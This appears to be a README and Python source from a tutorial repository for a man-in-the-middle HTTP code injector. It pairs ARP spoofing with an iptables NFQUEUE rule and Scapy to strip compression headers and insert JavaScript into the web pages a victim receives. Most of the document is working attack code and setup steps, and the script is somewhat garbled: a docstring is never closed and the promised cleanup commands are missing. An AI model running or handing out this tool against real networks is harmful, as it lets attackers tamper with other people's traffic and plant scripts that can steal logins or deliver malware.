- [How to Inject Code into HTTP Responses in the Network in Python](https://www.thepythoncode.com/article/injecting-code-to-html-in-a-network-scapy-python). ([code](scapy/http-code-injector/))

To run this:

- `pip3 install -r requirements.txt`

- Make sure you enabled IP forwarding, if you're using [this Python script](https://www.thepythoncode.com/code/building-arp-spoofer-using-scapy), then it'll automatically enable it.

- Start ARP Spoofing against the target using any tool such as [this Python script](https://www.thepythoncode.com/code/building-arp-spoofer-using-scapy) or arpspoof tool on Kali Linux.

- Add a new nfqueue FORWARD rule on `iptables`:

```bash

$ iptables -I FORWARD -j NFQUEUE --queue-num 0

```

When you're done, make sure you CTRL+C the ARP spoof script, disable IP forwarding and flushing the iptables:

from scapy.all import *

from colorama import init, Fore

import netfilterqueue

import re

init()

GREEN = Fore.GREEN

RESET = Fore.RESET

def process_packet(packet):

"""

# convert the netfilterqueue packet into Scapy packet

spacket = IP(packet.get_payload())

if spacket.haslayer(Raw) and spacket.haslayer(TCP):

if spacket[TCP].dport == 80:

# HTTP request

print(f"[*] Detected HTTP Request from {spacket[IP].src} to {spacket[IP].dst}")

try:

load = spacket[Raw].load.decode()

except Exception as e:

# raw data cannot be decoded, apparently not HTML

# forward the packet exit the function

packet.accept()

return

# remove Accept-Encoding header from the HTTP request

new_load = re.sub(r"Accept-Encoding:.*\r\n", "", load)

# set the new data

spacket[Raw].load = new_load

# set IP length header, checksums of IP and TCP to None

# so Scapy will re-calculate them automatically

spacket[IP].len = None

spacket[IP].chksum = None

spacket[TCP].chksum = None

# set the modified Scapy packet back to the netfilterqueue packet

packet.set_payload(bytes(spacket))

if spacket[TCP].sport == 80:

# HTTP response

print(f"[*] Detected HTTP Response from {spacket[IP].src} to {spacket[IP].dst}")

try:

load = spacket[Raw].load.decode()

except:

packet.accept()

return

# if you want to debug and see the HTML data

# print("Load:", load)

# Javascript code to add, feel free to add any Javascript code

added_text = "<script>alert('Javascript Injected successfully!');</script>"

# or you can add HTML as well!

# added_text = "<p><b>HTML Injected successfully!</b></p>"

# calculate the length in bytes, each character corresponds to a byte

added_text_length = len(added_text)

# replace the </body> tag with the added text plus </body>

load = load.replace("</body>", added_text + "</body>")

if "Content-Length" in load:

# if Content-Length header is available

# get the old Content-Length value

content_length = int(re.search(r"Content-Length: (\d+)\r\n", load).group(1))

# re-calculate the content length by adding the length of the injected code

new_content_length = content_length + added_text_length

# replace the new content length to the header

load = re.sub(r"Content-Length:.*\r\n", f"Content-Length: {new_content_length}\r\n", load)

# print a message if injected

if added_text in load:

print(f"{GREEN}[+] Successfully injected code to {spacket[IP].dst}{RESET}")

# if you want to debug and see the modified HTML data

# print("Load:", load)

# set the new data

spacket[Raw].load = load

# set IP length header, checksums of IP and TCP to None

# so Scapy will re-calculate them automatically

spacket[IP].len = None

spacket[IP].chksum = None

spacket[TCP].chksum = None

# set the modified Scapy packet back to the netfilterqueue packet

packet.set_payload(bytes(spacket))

# accept all the packets

packet.accept()

if __name__ == "__main__":

# initialize the queue

queue = netfilterqueue.NetfilterQueue()

# bind the queue number 0 to the process_packet() function

queue.bind(0, process_packet)

# start the filter queue

queue.run()